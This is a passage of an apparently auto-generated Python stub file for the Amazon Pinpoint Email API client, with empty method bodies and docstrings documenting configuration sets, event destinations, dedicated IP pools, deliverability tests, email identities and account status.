you send that use the configuration set.\n - **ReputationMetricsEnabled** *(boolean) --*\n If ``true`` , tracking of reputation metrics is enabled for the configuration set. If ``false`` , tracking of reputation metrics is disabled for the configuration set.\n - **LastFreshStart** *(datetime) --*\n The date and time (in Unix time) when the reputation metrics were last given a fresh start. When your account is given a fresh start, your reputation metrics are calculated starting from the date of the fresh start.\n :type SendingOptions: dict\n :param SendingOptions:\n An object that defines whether or not Amazon Pinpoint can send email that you send using the configuration set.\n - **SendingEnabled** *(boolean) --*\n If ``true`` , email sending is enabled for the configuration set. If ``false`` , email sending is disabled for the configuration set.\n :type Tags: list\n :param Tags:\n An object that defines the tags (keys and values) that you want to associate with the configuration set.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def create_configuration_set_event_destination(self, ConfigurationSetName: str, EventDestinationName: str, EventDestination: Dict) -> Dict:\n \"\"\"\n Create an event destination. In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n A single configuration set can include more than one event destination.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_configuration_set_event_destination(\n ConfigurationSetName='string',\n EventDestinationName='string',\n EventDestination={\n 'Enabled': True|False,\n 'MatchingEventTypes': [\n 'SEND'|'REJECT'|'BOUNCE'|'COMPLAINT'|'DELIVERY'|'OPEN'|'CLICK'|'RENDERING_FAILURE',\n ],\n 'KinesisFirehoseDestination': {\n 'IamRoleArn': 'string',\n 'DeliveryStreamArn': 'string'\n },\n 'CloudWatchDestination': {\n 'DimensionConfigurations': [\n {\n 'DimensionName': 'string',\n 'DimensionValueSource': 'MESSAGE_TAG'|'EMAIL_HEADER'|'LINK_TAG',\n 'DefaultDimensionValue': 'string'\n },\n ]\n },\n 'SnsDestination': {\n 'TopicArn': 'string'\n },\n 'PinpointDestination': {\n 'ApplicationArn': 'string'\n }\n }\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to add an event destination to.\n :type EventDestinationName: string\n :param EventDestinationName: **[REQUIRED]**\n A name that identifies the event destination within the configuration set.\n :type EventDestination: dict\n :param EventDestination: **[REQUIRED]**\n An object that defines the event destination.\n - **Enabled** *(boolean) --*\n If ``true`` , the event destination is enabled. When the event destination is enabled, the specified event types are sent to the destinations in this ``EventDestinationDefinition`` .\n If ``false`` , the event destination is disabled. When the event destination is disabled, events aren\\'t sent to the specified destinations.\n - **MatchingEventTypes** *(list) --*\n An array that specifies which events Amazon Pinpoint should send to the destinations in this ``EventDestinationDefinition`` .\n - *(string) --*\n An email sending event type. For example, email sends, opens, and bounces are all email events.\n - **KinesisFirehoseDestination** *(dict) --*\n An object that defines an Amazon Kinesis Data Firehose destination for email events. You can use Amazon Kinesis Data Firehose to stream data to other services, such as Amazon S3 and Amazon Redshift.\n - **IamRoleArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the IAM role that Amazon Pinpoint uses when sending email events to the Amazon Kinesis Data Firehose stream.\n - **DeliveryStreamArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the Amazon Kinesis Data Firehose stream that Amazon Pinpoint sends email events to.\n - **CloudWatchDestination** *(dict) --*\n An object that defines an Amazon CloudWatch destination for email events. You can use Amazon CloudWatch to monitor and gain insights on your email sending metrics.\n - **DimensionConfigurations** *(list) --* **[REQUIRED]**\n An array of objects that define the dimensions to use when you send email events to Amazon CloudWatch.\n - *(dict) --*\n An object that defines the dimension configuration to use when you send Amazon Pinpoint email events to Amazon CloudWatch.\n - **DimensionName** *(string) --* **[REQUIRED]**\n The name of an Amazon CloudWatch dimension associated with an email sending metric. The name has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **DimensionValueSource** *(string) --* **[REQUIRED]**\n The location where Amazon Pinpoint finds the value of a dimension to publish to Amazon CloudWatch. If you want Amazon Pinpoint to use the message tags that you specify using an X-SES-MESSAGE-TAGS header or a parameter to the SendEmail/SendRawEmail API, choose ``messageTag`` . If you want Amazon Pinpoint to use your own email headers, choose ``emailHeader`` . If you want Amazon Pinpoint to use link tags, choose ``linkTags`` .\n - **DefaultDimensionValue** *(string) --* **[REQUIRED]**\n The default value of the dimension that is published to Amazon CloudWatch if you don\\'t provide the value of the dimension when you send an email. This value has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **SnsDestination** *(dict) --*\n An object that defines an Amazon SNS destination for email events. You can use Amazon SNS to send notification when certain email events occur.\n - **TopicArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the Amazon SNS topic that you want to publish email events to. For more information about Amazon SNS topics, see the `Amazon SNS Developer Guide `__ .\n - **PinpointDestination** *(dict) --*\n An object that defines a Amazon Pinpoint destination for email events. You can use Amazon Pinpoint events to create attributes in Amazon Pinpoint projects. You can use these attributes to create segments for your campaigns.\n - **ApplicationArn** *(string) --*\n The Amazon Resource Name (ARN) of the Amazon Pinpoint project that you want to send email events to.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def create_dedicated_ip_pool(self, PoolName: str, Tags: List = None) -> Dict:\n \"\"\"\n Create a new pool of dedicated IP addresses. A pool can include one or more dedicated IP addresses that are associated with your Amazon Pinpoint account. You can associate a pool with a configuration set. When you send an email that uses that configuration set, Amazon Pinpoint sends it using only the IP addresses in the associated pool.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_dedicated_ip_pool(\n PoolName='string',\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type PoolName: string\n :param PoolName: **[REQUIRED]**\n The name of the dedicated IP pool.\n :type Tags: list\n :param Tags:\n An object that defines the tags (keys and values) that you want to associate with the pool.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def create_deliverability_test_report(self, FromEmailAddress: str, Content: Dict, ReportName: str = None, Tags: List = None) -> Dict:\n \"\"\"\n Create a new predictive inbox placement test. Predictive inbox placement tests can help you predict how your messages will be handled by various email providers around the world. When you perform a predictive inbox placement test, you provide a sample message that contains the content that you plan to send to your customers. Amazon Pinpoint then sends that message to special email addresses spread across several major email providers. After about 24 hours, the test is complete, and you can use the ``GetDeliverabilityTestReport`` operation to view the results of the test.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_deliverability_test_report(\n ReportName='string',\n FromEmailAddress='string',\n Content={\n 'Simple': {\n 'Subject': {\n 'Data': 'string',\n 'Charset': 'string'\n },\n 'Body': {\n 'Text': {\n 'Data': 'string',\n 'Charset': 'string'\n },\n 'Html': {\n 'Data': 'string',\n 'Charset': 'string'\n }\n }\n },\n 'Raw': {\n 'Data': b'bytes'\n }\n },\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {\n 'ReportId': 'string',\n 'DeliverabilityTestStatus': 'IN_PROGRESS'|'COMPLETED'\n }\n \n **Response Structure**\n - *(dict) --* \n Information about the predictive inbox placement test that you created.\n - **ReportId** *(string) --* \n A unique string that identifies the predictive inbox placement test.\n - **DeliverabilityTestStatus** *(string) --* \n The status of the predictive inbox placement test. If the status is ``IN_PROGRESS`` , then the predictive inbox placement test is currently running. Predictive inbox placement tests are usually complete within 24 hours of creating the test. If the status is ``COMPLETE`` , then the test is finished, and you can use the ``GetDeliverabilityTestReport`` to view the results of the test.\n :type ReportName: string\n :param ReportName:\n A unique name that helps you to identify the predictive inbox placement test when you retrieve the results.\n :type FromEmailAddress: string\n :param FromEmailAddress: **[REQUIRED]**\n The email address that the predictive inbox placement test email was sent from.\n :type Content: dict\n :param Content: **[REQUIRED]**\n The HTML body of the message that you sent when you performed the predictive inbox placement test.\n - **Simple** *(dict) --*\n The simple email message. The message consists of a subject and a message body.\n - **Subject** *(dict) --* **[REQUIRED]**\n The subject line of the email. The subject line can only contain 7-bit ASCII characters. However, you can specify non-ASCII characters in the subject line by using encoded-word syntax, as described in `RFC 2047 `__ .\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Body** *(dict) --* **[REQUIRED]**\n The body of the message. You can specify an HTML version of the message, a text-only version of the message, or both.\n - **Text** *(dict) --*\n An object that represents the version of the message that is displayed in email clients that don\\'t support HTML, or clients where the recipient has disabled HTML rendering.\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Html** *(dict) --*\n An object that represents the version of the message that is displayed in email clients that support HTML. HTML messages can include formatted text, hyperlinks, images, and more.\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Raw** *(dict) --*\n The raw email message. The message has to meet the following criteria:\n * The message has to contain a header and a body, separated by one blank line.\n * All of the required header fields must be present in the message.\n * Each part of a multipart MIME message must be formatted properly.\n * If you include attachments, they must be in a file format that Amazon Pinpoint supports.\n * The entire message must be Base64 encoded.\n * If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\\' email clients render the message properly.\n * The length of any single line of text in the message can\\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 `__ .\n - **Data** *(bytes) --* **[REQUIRED]**\n The raw email message. The message has to meet the following criteria:\n * The message has to contain a header and a body, separated by one blank line.\n * All of the required header fields must be present in the message.\n * Each part of a multipart MIME message must be formatted properly.\n * Attachments must be in a file format that Amazon Pinpoint supports.\n * The entire message must be Base64 encoded.\n * If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\\' email clients render the message properly.\n * The length of any single line of text in the message can\\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 `__ .\n :type Tags: list\n :param Tags:\n An object that defines the tags (keys and values) that you want to associate with the predictive inbox placement test.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def create_email_identity(self, EmailIdentity: str, Tags: List = None) -> Dict:\n \"\"\"\n Verifies an email identity for use with Amazon Pinpoint. In Amazon Pinpoint, an identity is an email address or domain that you use when you send email. Before you can use an identity to send email with Amazon Pinpoint, you first have to verify it. By verifying an address, you demonstrate that you're the owner of the address, and that you've given Amazon Pinpoint permission to send email from the address.\n When you verify an email address, Amazon Pinpoint sends an email to the address. Your email address is verified as soon as you follow the link in the verification email. \n When you verify a domain, this operation provides a set of DKIM tokens, which you can convert into CNAME tokens. You add these CNAME tokens to the DNS configuration for your domain. Your domain is verified when Amazon Pinpoint detects these records in the DNS configuration for your domain. It usually takes around 72 hours to complete the domain verification process.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.create_email_identity(\n EmailIdentity='string',\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {\n 'IdentityType': 'EMAIL_ADDRESS'|'DOMAIN'|'MANAGED_DOMAIN',\n 'VerifiedForSendingStatus': True|False,\n 'DkimAttributes': {\n 'SigningEnabled': True|False,\n 'Status': 'PENDING'|'SUCCESS'|'FAILED'|'TEMPORARY_FAILURE'|'NOT_STARTED',\n 'Tokens': [\n 'string',\n ]\n }\n }\n \n **Response Structure**\n - *(dict) --* \n If the email identity is a domain, this object contains tokens that you can use to create a set of CNAME records. To sucessfully verify your domain, you have to add these records to the DNS configuration for your domain.\n If the email identity is an email address, this object is empty. \n - **IdentityType** *(string) --* \n The email identity type.\n - **VerifiedForSendingStatus** *(boolean) --* \n Specifies whether or not the identity is verified. In Amazon Pinpoint, you can only send email from verified email addresses or domains. For more information about verifying identities, see the `Amazon Pinpoint User Guide `__ .\n - **DkimAttributes** *(dict) --* \n An object that contains information about the DKIM attributes for the identity. This object includes the tokens that you use to create the CNAME records that are required to complete the DKIM verification process.\n - **SigningEnabled** *(boolean) --* \n If the value is ``true`` , then the messages that Amazon Pinpoint sends from the identity are DKIM-signed. If the value is ``false`` , then the messages that Amazon Pinpoint sends from the identity aren't DKIM-signed.\n - **Status** *(string) --* \n Describes whether or not Amazon Pinpoint has successfully located the DKIM records in the DNS records for the domain. The status can be one of the following:\n * ``PENDING`` – Amazon Pinpoint hasn't yet located the DKIM records in the DNS configuration for the domain, but will continue to attempt to locate them. \n * ``SUCCESS`` – Amazon Pinpoint located the DKIM records in the DNS configuration for the domain and determined that they're correct. Amazon Pinpoint can now send DKIM-signed email from the identity. \n * ``FAILED`` – Amazon Pinpoint was unable to locate the DKIM records in the DNS settings for the domain, and won't continue to search for them. \n * ``TEMPORARY_FAILURE`` – A temporary issue occurred, which prevented Amazon Pinpoint from determining the DKIM status for the domain. \n * ``NOT_STARTED`` – Amazon Pinpoint hasn't yet started searching for the DKIM records in the DKIM records for the domain. \n - **Tokens** *(list) --* \n A set of unique strings that you use to create a set of CNAME records that you add to the DNS configuration for your domain. When Amazon Pinpoint detects these records in the DNS configuration for your domain, the DKIM authentication process is complete. Amazon Pinpoint usually detects these records within about 72 hours of adding them to the DNS configuration for your domain.\n - *(string) --* \n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The email address or domain that you want to verify.\n :type Tags: list\n :param Tags:\n An object that defines the tags (keys and values) that you want to associate with the email identity.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def delete_configuration_set(self, ConfigurationSetName: str) -> Dict:\n \"\"\"\n Delete an existing configuration set.\n In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.delete_configuration_set(\n ConfigurationSetName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to delete.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def delete_configuration_set_event_destination(self, ConfigurationSetName: str, EventDestinationName: str) -> Dict:\n \"\"\"\n Delete an event destination.\n In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.delete_configuration_set_event_destination(\n ConfigurationSetName='string',\n EventDestinationName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that contains the event destination that you want to delete.\n :type EventDestinationName: string\n :param EventDestinationName: **[REQUIRED]**\n The name of the event destination that you want to delete.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def delete_dedicated_ip_pool(self, PoolName: str) -> Dict:\n \"\"\"\n Delete a dedicated IP pool.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.delete_dedicated_ip_pool(\n PoolName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type PoolName: string\n :param PoolName: **[REQUIRED]**\n The name of the dedicated IP pool that you want to delete.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def delete_email_identity(self, EmailIdentity: str) -> Dict:\n \"\"\"\n Deletes an email identity that you previously verified for use with Amazon Pinpoint. An identity can be either an email address or a domain name.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.delete_email_identity(\n EmailIdentity='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The identity (that is, the email address or domain) that you want to delete from your Amazon Pinpoint account.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):\n \"\"\"\n Generate a presigned url given a client, its method, and arguments\n :type ClientMethod: string\n :param ClientMethod: The client method to presign for\n :type Params: dict\n :param Params: The parameters normally passed to\n ``ClientMethod``.\n :type ExpiresIn: int\n :param ExpiresIn: The number of seconds the presigned url is valid\n for. By default it expires in an hour (3600 seconds)\n :type HttpMethod: string\n :param HttpMethod: The http method to use on the generated url. By\n default, the http method is whatever is used in the method\\'s model.\n :returns: The presigned url\n \"\"\"\n pass\n\n def get_account(self) -> Dict:\n \"\"\"\n Obtain information about the email-sending status and capabilities of your Amazon Pinpoint account in the current AWS Region.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_account()\n \n **Response Syntax**\n ::\n {\n 'SendQuota': {\n 'Max24HourSend': 123.0,\n 'MaxSendRate': 123.0,\n 'SentLast24Hours': 123.0\n },\n 'SendingEnabled': True|False,\n 'DedicatedIpAutoWarmupEnabled': True|False,\n 'EnforcementStatus': 'string',\n 'ProductionAccessEnabled': True|False\n }\n \n **Response Structure**\n - *(dict) --* \n A list of details about the email-sending capabilities of your Amazon Pinpoint account in the current AWS Region.\n - **SendQuota** *(dict) --* \n An object that contains information about the per-day and per-second sending limits for your Amazon Pinpoint account in the current AWS Region.\n - **Max24HourSend** *(float) --* \n The maximum number of emails that you can send in the current AWS Region over a 24-hour period. This value is also called your *sending quota* .\n - **MaxSendRate** *(float) --* \n The maximum number of emails that you can send per second in the current AWS Region. This value is also called your *maximum sending rate* or your *maximum TPS (transactions per second) rate* .\n - **SentLast24Hours** *(float) --* \n The number of emails sent from your Amazon Pinpoint account in the current AWS Region over the past 24 hours.\n - **SendingEnabled** *(boolean) --* \n Indicates whether or not email sending is enabled for your Amazon Pinpoint account in the current AWS Region.\n - **DedicatedIpAutoWarmupEnabled** *(boolean) --* \n Indicates whether or not the automatic warm-up feature is enabled for dedicated IP addresses that are associated with your account.\n - **EnforcementStatus** *(string) --* \n The reputation status of your Amazon Pinpoint account. The status can be one of the following:\n * ``HEALTHY`` – There are no reputation-related issues that currently impact your account. \n * ``PROBATION`` – We've identified some issues with your Amazon Pinpoint account. We're placing your account under review while you work on correcting these issues. \n * ``SHUTDOWN`` – Your account's ability to send email is currently paused because of an issue with the email sent from your account. When you correct the issue, you can contact us and request that your account's ability to send email is resumed. \n - **ProductionAccessEnabled** *(boolean) --* \n Indicates whether or not your account has production access in the current AWS Region.\n If the value is ``false`` , then your account is in the *sandbox* . When your account is in the sandbox, you can only send email to verified identities. Additionally, the maximum number of emails you can send in a 24-hour period (your sending quota) is 200, and the maximum number of emails you can send per second (your maximum sending rate) is 1.\n If the value is ``true`` , then your account has production access. When your account has production access, you can send email to any address. The sending quota and maximum sending rate for your account vary based on your specific use case.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_blacklist_reports(self, BlacklistItemNames: List) -> Dict:\n \"\"\"\n Retrieve a list of the blacklists that your dedicated IP addresses appear on.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_blacklist_reports(\n BlacklistItemNames=[\n 'string',\n ]\n )\n \n **Response Syntax**\n ::\n {\n 'BlacklistReport': {\n 'string': [\n {\n 'RblName': 'string',\n 'ListingTime': datetime(2015, 1, 1),\n 'Description': 'string'\n },\n ]\n }\n }\n \n **Response Structure**\n - *(dict) --* \n An object that contains information about blacklist events.\n - **BlacklistReport** *(dict) --* \n An object that contains information about a blacklist that one of your dedicated IP addresses appears on.\n - *(string) --* \n An IP address that you want to obtain blacklist information for.\n - *(list) --* \n - *(dict) --* \n An object that contains information about a blacklisting event that impacts one of the dedicated IP addresses that is associated with your account.\n - **RblName** *(string) --* \n The name of the blacklist that the IP address appears on.\n - **ListingTime** *(datetime) --* \n The time when the blacklisting event occurred, shown in Unix time format.\n - **Description** *(string) --* \n Additional information about the blacklisting event, as provided by the blacklist maintainer.\n :type BlacklistItemNames: list\n :param BlacklistItemNames: **[REQUIRED]**\n A list of IP addresses that you want to retrieve blacklist information about. You can only specify the dedicated IP addresses that you use to send email using Amazon Pinpoint or Amazon SES.\n - *(string) --*\n An IP address that you want to obtain blacklist information for.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def get_configuration_set(self, ConfigurationSetName: str) -> Dict:\n \"\"\"\n Get information about an existing configuration set, including the dedicated IP pool that it's associated with, whether or not it's enabled for sending email, and more.\n In Amazon Pinpoint, *configuration sets* are groups of rules that you can apply to the emails you send. You apply a configuration set to an email by including a reference to the configuration set in the headers of the email. When you apply a configuration set to an email, all of the rules in that configuration set are applied to the email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.get_configuration_set(\n ConfigurationSetName='string'\n )\n \n **Response Syntax**\n ::\n {\n 'ConfigurationSetName': 'string',\n 'TrackingOptions': {\n 'CustomRedirectDomain': 'string'\n },\n 'DeliveryOptions': {\n 'SendingPoolName': 'string'\n },\n 'ReputationOptions': {\n 'ReputationMetricsEnabled': True|False,\n 'LastFreshStart': datetime(2015, 1, 1)\n },\n 'SendingOptions': {\n 'SendingEnabled': True|False\n }\n }\n \n **Response Structure**\n - *(dict) --* \n Information about a configuration set.\n - **ConfigurationSetName** *(string) --* \n The name of the configuration set.\n - **TrackingOptions** *(dict) --* \n An object that defines the open and click tracking options for emails that you send using the configuration set.\n - **CustomRedirectDomain** *(string) --* \n The domain that you want to use for tracking open and click events.\n - **DeliveryOptions** *(dict) --* \n An object that defines the dedicated IP pool that is used to send emails that you send using the configuration set.\n - **SendingPoolName** *(string) --* \n The name of the dedicated IP pool that you want to associate with the configuration set.\n - **ReputationOptions** *(dict) --* \n An object that defines whether or not Amazon Pinpoint collects reputation metrics for the emails that you send that use the configuration set.\n - **ReputationMetricsEnabled** *(boolean) --* \n If ``true`` , tracking of reputation metrics is enabled for the configuration set. If ``false`` , tracking of reputation metrics is disabled for the configuration set.\n - **LastFreshStart** *(datetime) --* \n The date and time (in Unix time) when the reputation metrics were last given a fresh start. When your account is given a fresh start, your reputation metrics are calculated starting from the date of the fresh start.\n - **SendingOptions** *(dict) --* \n An object that defines whether or not Amazon Pinpoint can send email that you send using the configuration set.\n - **SendingEnabled** *(boolean) --* \n If 